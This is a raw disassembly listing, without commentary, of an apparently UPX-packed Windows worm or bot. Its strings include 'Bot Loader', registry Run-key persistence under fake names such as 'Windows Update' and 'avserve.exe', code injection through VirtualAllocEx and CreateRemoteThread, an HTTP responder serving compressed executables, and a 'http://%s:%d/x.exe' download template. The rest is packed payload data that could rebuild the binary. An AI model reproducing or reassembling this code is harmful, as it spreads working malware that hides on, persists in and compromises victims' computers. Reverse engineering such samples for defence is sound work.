; sub_3090235D+EA�o
align 4
aUterm15 db 'uterm15',0 ; DATA XREF: sub_30901DA8:loc_30901E8D�o
; UPX0:309022FC�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_30901DA8+58�o
align 10h
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_30901DA8:loc_30901DEF�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_30901DA8+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_30901DA8+18�o
align 10h
dword_30904D70 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_30902036+F9�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_30902036+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_30902036+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
aGet db 'GET',0 ; DATA XREF: sub_30902036+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:309022E7�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_3090235D+F1�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_3090235D+E3�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_3090235D+DC�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_3090235D+CF�o
align 4
aU14 db 'u14',0 ; DATA XREF: sub_3090235D+BD�o
aU13 db 'u13',0 ; DATA XREF: sub_3090235D+B1�o
aU12 db 'u12',0 ; DATA XREF: sub_3090235D+A5�o
aU11 db 'u11',0 ; DATA XREF: sub_3090235D+99�o
aU10 db 'u10',0 ; DATA XREF: sub_3090235D+8D�o
aU9 db 'u9',0 ; DATA XREF: sub_3090235D+81�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_3090235D+75�o
align 10h
aU14x db 'u14x',0 ; DATA XREF: sub_3090235D+69�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_3090235D+5D�o
align 10h
aU12x db 'u12x',0 ; DATA XREF: sub_3090235D+51�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_3090235D+45�o
align 10h
aU10x db 'u10x',0 ; DATA XREF: sub_3090235D+3B�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_3090235D+22�o
align 10h
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_3090267B+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_3090216F+23�o
; sub_3090294F+5F�o ...
align 4
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_3090216F+1C�o
; sub_309029FD+87�o ...
align 4
aDfashnzdsdl db 'dfashnzdsdl',0 ; DATA XREF: sub_309015C7+4F�o
; sub_30902AC9+57�o ...
dd 3 dup(0)
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_30902AC9+32�o
aClient db 'Client',0 ; DATA XREF: sub_30902AC9+BC�o
; sub_30902AC9+F8�o
align 10h
aId db 'ID',0 ; DATA XREF: sub_30902AC9+37�o
; sub_30902AC9+75�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_3090294F+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_3090294F+47�o
align 10h
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_3090294F+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_3090294F+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_3090294F+32�o
align 10h
aSystray db 'SysTray',0 ; DATA XREF: sub_3090294F+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_3090294F+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_3090294F+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_3090294F+16�o
align 10h
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_3090294F+F�o
align 4
a1: ; DATA XREF: sub_30902AC9+B7�o
unicode 0, <1>,0
dd 6 dup(0)
dword_30904FC8 dd 0 ; sub_3090216F+80�w
dword_30904FCC dd 0 ; sub_3090216F+2D�w
dword_30904FD0 dd 0 ; sub_30902036:loc_309020E4�r ...
dword_30904FD4 dd 68h ; UPX0:30902307�w ...
dword_30904FD8 dd 0 ; sub_3090235D+33�w
dword_30904FDC dd 0 ; sub_3090267B+20�r
dword_30904FE0 dd 30900000h ; UPX0:309022EC�w
dword_30904FE4 dd 0 ; sub_3090252C+37�o ...
dword_30904FE8 dd 0 ; UPX0:3090272A�w
word_30904FEC dw 0 ; DATA XREF: sub_309024C8+3B�r
; sub_3090252C:loc_3090258D�r ...
align 10h
dword_30904FF0 dd 0 ; sub_30902AC9+110�w
align 10h
UPX0 ends
; Section 2. (virtual address 00005000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00005000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 30905000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_30905000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:30906B01�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 65746E49h, 636F6C72h, 4964656Bh
dd 6572636Eh, 746E656Dh, 72430100h, 65746165h, 6E657645h
dd 1004174h, 74696157h, 53726F46h, 6C676E69h, 6A624F65h
dd 746365h, 69725701h, 69466574h, 100656Ch, 736F6C43h
dd 6E614865h, 656C64h, 65724301h, 46657461h, 41656C69h
dd 736C0100h, 656C7274h, 100416Eh, 7274736Ch, 41746163h
dd 65470100h, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 47010041h, 6F4C7465h, 656C6163h, 6F666E49h, 53010041h
dd 7065656Ch, 736C0100h, 70637274h, 416E79h, 74654701h
dd 72727543h, 50746E65h, 65636F72h, 1007373h, 50746547h
dd 41636F72h, 65726464h, 1007373h, 64616F4Ch, 7262694Ch
dd 41797261h, 72570100h, 50657469h, 65636F72h, 654D7373h
dd 79726F6Dh, 704F0100h, 72506E65h, 7365636Fh, 47010073h
dd 6F4D7465h, 656C7564h, 646E6148h, 41656Ch, 74654701h
dd 6B636954h, 6E756F43h, 43010074h, 74616572h, 74754D65h
dd 417865h, 65724301h, 54657461h, 61657268h, 43010064h
dd 74616572h, 6F725065h, 73736563h, 53010041h, 76457465h
dd 746E65h, 65704F01h, 6576456Eh, 41746Eh, 69784501h, 72685474h
dd 646165h, 61655201h, 6C694664h, 47010065h, 69467465h
dd 6953656Ch, 100657Ah, 74697845h, 636F7250h, 737365h
dd 74654701h, 7473614Ch, 6F727245h, 44010072h, 74656C65h
dd 6C694665h, 4165h, 0D1h, 0
dd 67655201h, 61657243h, 654B6574h, 41784579h, 65520100h
dd 74655367h, 756C6156h, 41784565h, 65520100h, 65755167h
dd 61567972h, 4565756Ch, 1004178h, 4F676552h, 4B6E6570h
dd 78457965h, 52010041h, 65446765h, 6574656Ch, 756C6156h
dd 1004165h, 43676552h, 65736F6Ch, 79654Bh, 6F624101h
dd 79537472h, 6D657473h, 74756853h, 6E776F64h, 43010041h
dd 74707972h, 61657243h, 61486574h, 1006873h, 70797243h
dd 73614874h, 74614468h, 43010061h, 74707972h, 69726556h
dd 69537966h, 74616E67h, 41657275h, 72430100h, 44747079h
dd 72747365h, 6148796Fh, 1006873h, 70797243h, 73654474h
dd 796F7274h, 79654Bh, 79724301h, 65527470h, 7361656Ch
dd 6E6F4365h, 74786574h, 72430100h, 41747079h, 69757163h
dd 6F436572h, 7865746Eh, 1004174h, 70797243h, 706D4974h
dd 4B74726Fh, 7965h, 0DEh, 0E8h, 61727301h, 100646Eh, 636D656Dh
dd 1007970h, 6C727473h, 1006E65h, 736D656Dh, 1007465h
dd 646E6172h, 655F0100h, 70656378h, 61685F74h, 656C646Eh
dd 1003372h, 73727473h, 1007274h, 63727473h, 7268h, 0E9h
dd 10Ch, 6E694601h, 6E695764h, 41776F64h, 65470100h, 726F4674h
dd 6F726765h, 57646E75h, 6F646E69h, 47010077h, 69577465h
dd 776F646Eh, 65726854h, 72506461h, 7365636Fh, 644973h
dd 70737701h, 746E6972h, 4166h, 0F4h, 120h, 746E4901h
dd 656E7265h, 65704F74h, 6C72556Eh, 49010041h, 7265746Eh
dd 4F74656Eh, 416E6570h, 6E490100h, 6E726574h, 6C437465h
dd 4865736Fh, 6C646E61h, 49010065h, 7265746Eh, 4774656Eh
dd 6F437465h, 63656E6Eh, 53646574h, 65746174h, 6E490100h
dd 6E726574h, 65527465h, 69466461h, 656Ch, 100h, 138h
dd 0FF0073FFh, 0DFF0002h, 1FF00h, 0FF0039FFh, 34FF006Fh
dd 17FF00h, 0FF000CFFh, 4FF0009h, 13FF00h, 0FF0010FFh
dd 3FF0016h, 0
dd 45500000h, 14C0000h, 11EC0002h, 40D2h, 0
dd 0E00000h, 10B010Fh, 24000006h, 10000000h, 0
dd 22DF0000h, 10000000h, 40000000h, 0
db 90h
db 30h, 0, 10h
dd 2000000h, 40000h, 0
dd 40000h, 0
dd 50000000h, 4000000h, 0
dd 20000h, 0
dd 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 2C940000h, 8C0000h, 14h dup(0)
dd 10000000h, 1780000h, 6 dup(0)
dd 742E0000h, 747865h, 239C0000h, 10000000h, 24000000h
dd 4000000h, 3 dup(0)
dd 200000h, 642EE004h, 617461h, 0FF40000h, 40000000h, 10000000h
dd 28000000h, 3 dup(0)
dd 400000h, 4000C000h, 2E980000h, 44AE0000h, 0CF4D0000h
dd 0A0024AC8h, 0AE1633A0h, 28695B9h, 0A73D7D03h, 369F6801h
dd 76BB21B7h, 3A4A58E6h, 1B5AB7CCh, 66E43DB9h, 6A7684E0h
dd 96F42A70h, 0A4073647h, 5EC860C4h, 0D997640Ah, 7A1939F0h
dd 0A2280084h, 364B383Fh, 3C2ECDDBh, 10FCB26Ch, 77BDE298h
dd 16754E4h, 7E500FDCh, 0C2DE1F2h, 0AC6870E3h, 0D328C00Dh
dd 18D89C67h, 0E52708C9h, 6C861104h, 0DB0C7A6Eh, 4BC54C30h
dd 2D4886C8h, 2EDB1CD6h, 0F3492FC8h, 41A8DE40h, 2719DE44h
dd 40BC4B6Ch, 1BDE5044h, 0D6336F5h, 94B71E10h, 0EEB6970Dh
dd 812193BFh, 0E87CACF9h, 1624A580h, 0B0250600h, 687E9F25h
dd 1C9D1C52h, 99DE1276h, 96F47258h, 4C0AEF1Dh, 4B1E7C6Ah
dd 7BC89C36h, 91BE4944h, 0C93C3E49h, 90E1547Bh, 0DD92EDCCh
dd 0C49FE924h, 0CF782449h, 364052EDh, 0F88248CCh, 3331150Ch
dd 66F4C2C2h, 86C7A02h, 9A85D0E8h, 0F42C5E70h, 4F03845Fh
dd 1C09F89Bh, 204D1C54h, 83C07FA4h, 0A035EFEEh, 868F805h
dd 0E4375712h, 57D85B27h, 4C145A74h, 4B74F80Eh, 0DD1CD868h
dd 8682C4A2h, 0B6E53D74h, 8125A59Fh, 0FF9C4120h, 0E80FFC55h
dd 167B5CD6h, 0AC50E4B9h, 6C0E9628h, 0F0EAFD35h, 0F8550702h
dd 0E48C0009h, 0C0EC4EC1h, 0CF47558h, 321C4B87h, 0D8B18F1h
dd 0E7619DE0h, 0EFFB648Bh, 573C41FEh, 6468C103h, 34488B84h
dd 8950788Bh, 0B0A0F44Dh, 0BE6062A5h, 0D85468D8h, 0A51ACBADh
dd 8A01F09Ah, 70631269h, 74ECE1ACh, 0D7300DEDh, 0E82110Ch
dd 6C9A9D1Bh, 0A9DB1009h, 645D8B4Dh, 5051F8E1h, 68971418h
dd 683A412Ah, 5DAC1B14h, 0BA03CAF8h, 6B58D12Ah, 57B3D434h
dd 0E6ED831Dh, 0F05559ABh, 74CF7C7Dh, 376CC245h, 51F03EBAh
dd 315350E9h, 0EE13C1A8h, 0D6D45FD9h, 0DA6A17FAh, 0D0E27FD4h
dd 3BEC5577h, 100574C7h, 0E1731BEBh, 4D77B631h, 59DD0E68h
dd 3505FC0Eh, 0EB6E7343h, 0EF740807h, 0BB860949h, 51174878h
dd 0F60E751h, 12C86931h, 0D144685h, 0AEBB425h, 0AFDD836Dh
dd 0E8B213B1h, 44CEBA0Fh, 0C22D59ACh, 0B8B66AF9h, 67B712C4h
dd 500C803Ch, 585250A8h, 507D9DD3h, 195DBC2Ch, 0E91167F1h
dd 57437C20h, 14247C8Bh, 6A37160Ch, 177EC998h, 0D5931A84h
dd 0C280FFFFh, 1E148861h, 7CF73B46h, 3B2480E9h, 19544400h
dd 43575B6Fh, 5A5F2E44h, 0DB5657ACh, 0D4C06074h, 732F8766h
dd 0B6225BDCh, 1950F0BBh, 0AA005650h, 0F0E77ACh, 0C09584D0h
dd 3249F405h, 683DADBAh, 0FFF00CFAh, 5B2708C7h, 34346DA6h
dd 482E2ACCh, 66B5CE75h, 4C0A0AB6h, 181A20BCh, 84F85805h
dd 0B807C650h, 2C013B7Fh, 0F6B7C73Bh, 8B0C40h, 8D510801h
dd 215F2444h, 84D3112Ch, 3D3166Dh, 43072459h, 7FAB4277h
dd 0C42007BBh, 9E3FDB2Fh, 0C8E433A1h, 10E7C1F8h, 0CD860B85h
dd 6E3233h, 125D8B02h, 0A3807238h, 7AC1AB33h, 756480Ch
dd 9BC6537Ch, 0F6ABD9E1h, 8451E11h, 0E5E46825h, 8026B40Eh
dd 0CDC3E700h, 17C1C80Ch, 35884228h, 99DC6637h, 683D9864h
dd 0D044B7A4h, 362C0D4Fh, 8CFE4763h, 98BAA54Dh, 0DA149B85h
dd 0BF007C54h, 34775F81h, 0B933A1h, 3BC72B79h, 0EE0272C1h
dd 8BDD76EDh, 2949E1C1h, 318C8A1h, 0B4AC23C7h, 8452DFC4h
dd 2F72233Dh, 64F8786Ah, 3D67851Bh, 0E113C4EBh, 0E4D68743h
dd 6815F26Eh, 68030B74h, 59D68A70h, 2D2F2CDBh, 45534753h
dd 63E8C47Eh, 8B17CC76h, 0A3ED04C2h, 30CE0919h, 0A4AFE757h
dd 82436D4Eh, 4EE3B3D0h, 43753B99h, 680662D7h, 1D89805Bh
dd 25D42791h, 0E717B6DAh, 0C7B314DFh, 0CC1300F2h, 533CF6B6h
dd 3A01027Bh, 0AD468E96h, 0ED6A8049h, 34A36740h, 22741A6Bh
dd 0DE97D4C0h, 0FFA3BD59h, 97F1A310h, 0B67453FCh, 495184C6h
dd 0FD03A79h, 5BB62337h, 5EEC2656h, 169A840Ch, 10C254BEh
dd 56B35EF8h, 0A5E93B3Eh, 89E80C99h, 500EC5Dh, 7DD837FFh
dd 1FFF25FBh, 0A3C33A04h, 0E77443DCh, 57CC8A12h, 84FA126Fh
dd 50DF74C9h, 0A42EA5Eh, 0C6616E99h, 6458983Ch, 6BE8400Ch
dd 5F6E0AFAh, 1FD807F8h, 0A472F644h, 366891FEh, 60FEA20h
dd 0CF53E2EBh, 70A12E60h, 9043455Fh, 0B30EBDD6h, 38A17001h
dd 11D6B033h, 6DA1E983h, 0D6D9023Eh, 0D8CC802Dh, 68B0CD86h
dd 0E0A3ABE8h, 0EC6E0E0h, 6E7C1158h, 0DC1AD4A3h, 6C304ECFh
dd 4552B73Dh, 1C0D29D8h, 766FB382h, 1A4B1904h, 235D68C5h
dd 7DAFA413h, 0DEBE61A2h, 99591379h, 0D5830469h, 44D835D8h
dd 11402C74h, 3A9C812Bh, 0CDB3C388h, 4E7E6CAAh, 5F70388Fh
dd 0A35EB7B9h, 68FC0843h, 2D71850h, 0F6032032h, 482404C7h
dd 7938400Bh, 30032032h, 64DD0E2Ch, 28A40640h, 64062024h
dd 181C0640h, 0D0BF0714h, 38395943h, 0C683974h, 63915C4Eh
dd 0F5A4CC3Bh, 0FC064E04h, 93090B4Dh, 58F41C93h, 0ECEDC90Ah
dd 0EBAF12B6h, 0EC15216Fh, 1E169C0Ah, 0D739044Ch, 454CF326h
dd 3B0B3E90h, 0B657141Dh, 5A138818h, 0F049C168h, 1402E3EBh
dd 247031B1h, 1413FE0Ch, 0B6011F0Ah, 5E7FA480h, 0B458A51h
dd 0EC38FA5Dh, 32FF1BADh, 4E3A52DBh, 97C423ECh, 3831F86Eh
dd 8825EA5Dh, 73B0B5Dh, 0FB8067F0h, 35B70FB5h, 9953A4ECh
dd 0D603FEF7h, 19FF8CB6h, 80C3FE3Ch, 0BD72FFFBh, 2762785Eh
dd 765DA930h, 3320C25Fh, 64C870ADh, 84F5868h, 4CDB681h
dd 510D0A86h, 6C530B09h, 6618EC13h, 0F753E75h, 25B3B562h
dd 0EA24C863h, 0A1323D89h, 84BC83D2h, 43D703FFh, 47E1FB81h
dd 0B7C98D62h, 5D875F9Fh, 0CAE77B3Ch, 1873CD74h, 0CF2F97A2h
dd 0B1812DB7h, 0FF04FD73h, 0F35F8DFEh, 7F3CA716h, 0AD6BF788h
dd 3B16618Bh, 0A43B8B6Ch, 0A33EAADCh, 4EC044A0h, 2F9E5776h
dd 90629C57h, 0F887B3DBh, 252C1359h, 0E25E1AFFh, 75B36C56h
dd 1068A3EEh, 0CD3A627h, 0BEC8EC3Ch, 70849ED3h, 96130DEh
dd 4E0EA918h, 72D63018h, 508F80C9h, 0BD781E8Ah, 0B068BAB6h
dd 80DCEB0Ah, 0B67B7C0h, 6068B003h, 7AB0EC4Eh, 1110DC97h
dd 6C42F2E5h, 0F4C9B0BAh, 0B80C61Dh, 555CF7DFh, 2CEF0056h
dd 425793B0h, 0D0CCE6E4h, 51C498F0h, 0FD1F0CA5h, 389B120Dh
dd 531413F4h, 56DFF612h, 20BDDB3h, 0E838506Ah, 0D205EA5Dh
dd 7A1C6B96h, 187400EDh, 10B21109h, 384EEC05h, 141998h
dd 1606D84Fh, 9F840E77h, 746EAA28h, 0C7D5530Dh, 0D8B1080Dh
dd 39C21051h, 6FA1AC4Ch, 0ED3A6728h, 117EED85h, 0DB17B456h
dd 593DB61Dh, 96EF144Dh, 0F2EBA205h, 496E2C0Dh, 0EB657506h
dd 6058ABDDh, 3F681DA2h, 8D47CC1Bh, 0C323058h, 0C06E5A15h
dd 109DF161h, 51E01408h, 0BA385B2Dh, 0AD5618E7h, 31F618E8h
dd 3E8D85C6h, 0DC743D56h, 0E05B742Ah, 8461AA0Ch, 0B6102050h
dd 18B2C9C0h, 5E680308h, 0C598850Fh, 0C68B552Fh, 0EC99AA92h
dd 562E75ACh, 5556532Ch, 82C5AC00h, 0AD62701h, 90392652h
dd 0C040CE5h, 0F20C385Dh, 128602Ch, 707FDE53h, 4EDF3E29h
dd 0F2948ED2h, 0E05C1E3Ch, 366F1783h, 0B5F7794Eh, 0F16C8897h
dd 0A4DEBD6Eh, 0B35687Ah, 0F662BD8h, 0A410B296h, 17A04F77h
dd 821C3820h, 748D477Dh, 0C1B3C566h, 0FC39011Eh, 0A379B156h
dd 1CDC07F7h, 45E0B5FFh, 1F0FFFF6h, 5CD999Bh, 50600852h
dd 1AB99D46h, 0BD767C0Eh, 8E38B789h, 120385EDh, 0C757D00Fh
dd 91249003h, 66E4723h
dd 64D87CD4h, 723958DCh, 50E0C8E4h, 2CE844E4h, 383220ECh
dd 4F01C8Eh, 0B0F6F4F4h, 69A2F9C4h, 1BBF0A7Dh, 0C716C8BEh
dd 8B35B0C2h, 0B0C8E718h, 5EA34597h, 0E177529h, 6C1769AAh
dd 180B1DB2h, 0A4833793h, 4D64D448h, 814275B6h, 609B08C4h
dd 9741478h, 98BBE0ADh, 88037F45h, 7340636Ah, 0FC17A184h
dd 831B3813h, 0C08303E0h, 170D0105h, 2752A795h, 0DC8BC85Fh
dd 0BC107210h, 0CC38693Dh, 26D63BDCh, 0DE38140Eh, 0E17B3059h
dd 404C6150h, 0C596FB20h, 0ABF6F82Ch, 0B366C640h, 90309598h
dd 9F424B41h, 0F454140Dh, 2C076F01h, 0D8A61E81h, 7D830184h
dd 0C579562Eh, 14C7481Fh, 10DB802Fh, 52F02503h, 1D6AE05Dh
dd 0EF843081h, 71CCBF50h, 303F51F0h, 74EA41D0h, 0BB0ADB37h
dd 0EC457309h, 52D165AFh, 0BCA2F453h, 6C5ECF7h, 0B1383D53h
dd 2590FEBh, 0CE35ED9Dh, 7D68B632h, 0B2D81C6h, 0BB2665E2h
dd 0F17B2D9Bh, 9D4FAC68h, 60B9BB46h, 7385F40Dh, 125E74F9h
dd 0A04D2C9Dh, 314CE7ADh, 8DE12199h, 0FD3BBBC6h, 82316F2Ch
dd 7F0AE6Ch, 15EB0C48h, 216C5A31h, 7409CD60h, 0C300C8E5h
dd 0D80C07FBh, 333D4F07h, 7668FA44h, 7B9B136Ah, 4011B67Bh
dd 25FF00CCh, 0F40509FCh, 23233583h, 0CCECF0h, 350BEF51h
dd 9B8D4352h, 0E9811472h, 63FB7D0Bh, 85042DBFh, 0EC731701h
dd 0C48BC82Bh, 8BE18B0Ch, 0DD232308h, 5004925Bh, 5C644FC3h
dd 61055058h, 4963h, 22C02A28h, 4BF15BF1h, 240206F3h, 31415352h
dd 0FF012D80h, 177FFFFh, 11838DF5h, 2AEC5279h, 0E7F63AE4h
dd 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 4032615Eh, 0A0FFFFFFh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 0FF72657Ah, 0B37FFFFFh, 697A6F4Dh, 2F616C6Ch, 20302E34h
dd 6D6F6328h, 69746170h, 3B656C62h, 0FB534D20h, 49F6B7FFh
dd 15362045h, 6E695709h, 73776F64h, 20544E20h, 29312E35h
dd 377E696Fh, 12C1CA8h, 41FC040Ch, 0DF3CF3ECh, 9D800B7h
dd 0ACB80EC8h, 3DF3CFA0h, 748090CFh, 545C6804h, 3CF3CF3Ch
dd 10203444h, 0A650BF08h, 0F040FCF9h, 687465B6h, 7DBF7261h
dd 2E64FDBBh, 7A6962h, 0BA6B6308h, 766C2E73h, 76766317h
dd 0B6C7722Eh, 775B797h, 65777777h, 65A76C64h, 0DB6F6C0Fh
dd 76B76FF7h, 306F670Ah, 74736F68h, 0E76B732Eh, 0F665E566h
dd 73DBB1B7h, 68634565h, 6C1E0022h, 736E6564h, 0F6B7DA61h
dd 660FB3DAh, 0FF095775h, 0D66B6EEBh, 69FFDACEh, 67726F2Eh
dd 6F727400h, 611F206Ah, 0B7863A3Ch, 616BEC65h, 83746D0Ch
dd 2F2E782Dh, 7B5ADB6Ch, 0E71065Bh, 2B6B2A62h, 0DB6D9DBFh
dd 7A027626h, 7405630Bh, 6E2E706Fh, 636D96E6h, 735B6917h
dd 16B56B27h, 78D80B7Eh, 6C757A0Fh, 83652D74h, 1DAD6869h
dd 6B5B17D6h, 80C2BA8Dh, 9557BE15h, 9F694F91h, 0F685BF32h
dd 777800FBh, 626A2C61h, 9B002562h, 7C24617Ah, 6166D9DBh
dd 655D2EA8h, 0DBE75C23h, 6143C2FFh, 66236362h, 6A696867h
dd 6E6D6C6Bh, 0BFFF71C5h, 0F772B7F1h, 78777675h, 418C7A79h
dd 45444342h, 49484746h, 4D4C4B4Ah, 0F2FF68C3h, 51504F4Eh
dd 57565554h, 1B5A5958h, 0B03B9B5Bh, 747468FFh, 2F2F3A70h
dd 2F0B7325h, 7E2E9765h, 70F0B6FBh, 0E3F7068h, 73260F3Dh
dd 64066E63h, 666E6926h, 7B7DB729h, 313D3B76h, 74132635h
dd 0F6BBD81Bh, 58EB0760h, 3732313Dh, 3A3101A8h, 0FBEC8D80h
dd 2F303038h, 0DFDF65h, 0FFDB6FE8h, 335DDFFFh, 0EEB966C9h
dd 5758D01h, 68AFE8Bh, 4607993Ch, 46302C06h, 0FFE8946Fh
dd 7889934h, 0EBEDE247h, 54DAE80Ah, 2E676557h, 0F7FEDFFFh
dd 0C9999371h, 0BDFD1201h, 716FD91h, 0AA6872C1h, 0AA66FD42h
dd 14BA10FDh, 0EFF75BB1h, 1A98A91Ch, 0F198F3C9h, 71028608h
dd 0FB0F10C0h, 5F90FFB3h, 599237CBh, 3A781C96h, 7157E414h
dd 713A0A7Dh, 93EDBEFBh, 0F19DF345h, 0F1098904h, 8E119C04h
dd 409D23FDh, 0E3F367B3h, 0DC1C10F0h, 3D59B20Bh, 60EDEFF6h
dd 125C99Bh, 0A10414D9h, 9E71CA17h, 8F964617h, 61688D2Bh
dd 0E21AAD91h, 6F6D1D96h, 2811B3EDh, 0C850B2h, 57DC1499h
dd 0DEDF2555h, 4E129FEDh, 1291C0A4h, 0F7ED9949h, 0C4140054h
dd 0DD87CA3Ah, 71CBECFDh, 24FF1C3Bh, 0CF1A21E4h, 668FCDCDh
dd 0B36C9FFBh, 1E3F812Ch, 83B8B0FBh, 5D12CDC3h, 6F9DB2A8h
dd 1DCBC9B6h, 0B24AD25h, 7F64C9FEh, 96A6485Ah, 4C1B14C0h
dd 0F3EBA729h, 0B3F7D99Ch, 16E9BACBh, 7126F434h, 6F0EFCF5h
dd 0F9FFF776h, 29EF133Bh, 5F376B46h, 0EC4766DEh, 116ACA8h
dd 0FFEF610Fh, 0EDFFC5B7h, 0FDE9ECE9h, 2CE1FCB7h, 0FCF5CA01h
dd 0BBFDBFFFh, 0FCF25AFCh, 0F5FCF7EBh, 0C7D6ABAAh, 59AAF934h
dd 2A2A25B4h, 93ACC966h, 0E5FF67F0h, 90B78190h, 0C983639Dh
dd 309271CDh, 513519BFh, 0EC20FF14h, 0A95D9BEh, 712A9172h
dd 0A5D2EBC8h, 0E180D512h, 0FB46FE9Ah, 6FAA52FFh, 9A2A8D14h
dd 8B12B9C8h, 0C3474A9Ah, 0DB9BAB9Eh, 0FDBFA319h, 0EC20DFFFh
dd 0BDDDA26Ch, 0DF9EED85h, 0EB81E8A2h, 0C8125544h, 2E961FBDh
dd 912EB8Dh, 0D8FFCD0Bh, 125A9A85h, 5A9A099Dh, 0D096F810h
dd 0BB6F6E22h, 7F6649FFh, 8712FEFDh, 95C25AA9h, 82128502h
dd 0F95A9104h, 0CBDB4067h, 85B7CFF7h, 424D53FFh, 9CFF472h
dd 0C85318B9h, 62FEFFh, 5B435002h, 83BFFFE3h, 4F575445h
dd 50204B52h, 52474F52h, 31204D41h, 0EB4C17CDh, 41ED6290h
dd 0A024D4Eh, 0B61566ABh, 0B752B75Bh, 0AA676B03h, 330E7075h
dd 96EB74B6h, 4D27611Ah, 21583223h, 66D33232h, 2E321F2Ah
dd 2018D631h, 33C8C93Ch, 0A48B3258h, 0DBEC0773h, 0CFA5A85h
dd 40023FFh, 0DA140A11h, 201B1AA5h, 6976D405h, 7F044C00h
dd 534BDE88h, 97EF5053h, 17E00882h, 8291EDF8h, 6E240057h
dd 6F006400h, 0DE73009Dh, 3A736C5Eh, 9013074h, 3500398Ch
dd 0C896DCC0h, 72E1D23h, 89CF2000h, 8ABDA6Ch, 9389DA20h
dd 9F57324Ch, 902A0003h, 463B06C1h, 40074723h, 1E46E7FFh
dd 10060006h, 8A151F01h, 48E088h, 4BFFFD4Fh, 364400D1h
dd 0F27A6A19h, 281C49E4h, 742530AFh, 85536710h, 0E181137Ch
dd 0AE75DF5Ch, 303CB6B9h, 75C0400h, 36085ABDh, 5CBDD772h
dd 72E4D61h, 2E380036h, 6D8B9B77h, 491B3037h, 2043EC00h
dd 79003F00h, 64633B0Eh, 6DFF20A2h, 4DC08F9h, 0FF1640h
dd 0E00DEDEh, 13091600h, 19FF612h, 28402602h, 0BF7DC346h
dd 8B110319h, 0D374D96Ch, 0C1ACBBE4h, 9C2A9B70h, 0B3D8256Bh
dd 109F296Dh, 1B04480Eh, 1DD75D6Dh, 5A541354h, 22596326h
dd 0B9FF345Ch, 45CBC7CFh, 58765h, 4810030Bh, 83DEC5FFh
dd 0EB810B8h, 286A050Bh, 0E10C3919h, 0B1FFEC7Fh, 0A89B11D0h
dd 0D94FC000h, 5D5FF52Eh, 1CEB8A88h, 0E89F11C9h, 97B22E3Ch
dd 48102B7Dh, 0F40CD160h, 0E43C60A3h, 0CA07C95h, 0CB10CA0h
dd 8032393Bh, 880CA000h, 0F9278440h, 900FEh, 703ECh, 4F401495h
dd 7B06C8A5h, 0BF40707Ch, 0FFC20700h, 1343EC88h, 138578h
dd 0E9A65BABh, 0E409CF13h, 2FF81079h, 300EFEFFh, 2318D458h
dd 0D308FE40h, 84C1D27Dh, 10B94388h, 3601FFEEh, 0B8E4F279h
dd 0AD200C10h, 15E5070Dh, 0F7F61F2h, 0F0118D8h, 709F2579h
dd 0F840F84h, 0FC9E0F95h, 2009006h, 6C0F847Fh, 8784AA0Fh
dd 0A89A004Dh, 0C88C096Fh, 1F1343DEh, 3FCAC0A6h, 50586E69h
dd 725020h, 3C844F46h, 390144DBh, 123C6B32h, 3C840D15h
